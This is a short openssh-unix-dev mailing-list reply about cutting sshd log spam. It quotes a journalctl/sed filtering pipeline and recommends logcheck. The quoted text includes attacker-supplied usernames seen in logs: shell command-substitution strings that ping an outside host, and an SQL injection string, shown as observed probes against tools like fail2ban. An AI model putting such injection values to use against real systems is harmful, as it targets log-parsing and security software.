Minimize sshd log clutter/spam from unauthenticated connections
Keine Eile
keine-eile at e-mail.de
Mon Mar 20 02:46:14 AEDT 2023
[...]
> journalctl -t sshd -o cat \
> | grep -v '^Accepted ' \
> | sed -E 's/[Uu]ser \S+/user .../' \
> | sed -E 's/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/0.0.0.0/' \
> | sed -E 's/port\s+[0-9]+/port 0/' \
> | sed -E 's/".*"/"..."/' \
> | sed -E 's/Change of username or service not allowed: .+/Change of username or service not allowed: .../' \
> | sed -E 's/Their offer: .+/Their offer: .../' \
> | sort -u
>
> I found a select few attempts to mess with, identify, or exploit log parsing IDS/IPS software like fail2ban (and feel confirmed in my choice of an alternative solution with far less attack surface, see my other mail):
>
> Invalid user $(ping -c 1 16e939dc.ad.xspzo.com) from ...
> Invalid user ' $(ping -c 1 16e939dc.ad.xspzo.com) from ...
> Invalid user ' or '1'='1' - from 176.100.42.41
[...]
May I suggest, you take a look at logcheck(8). It seems, that this what you are looking for.
More information about the openssh-unix-dev
mailing list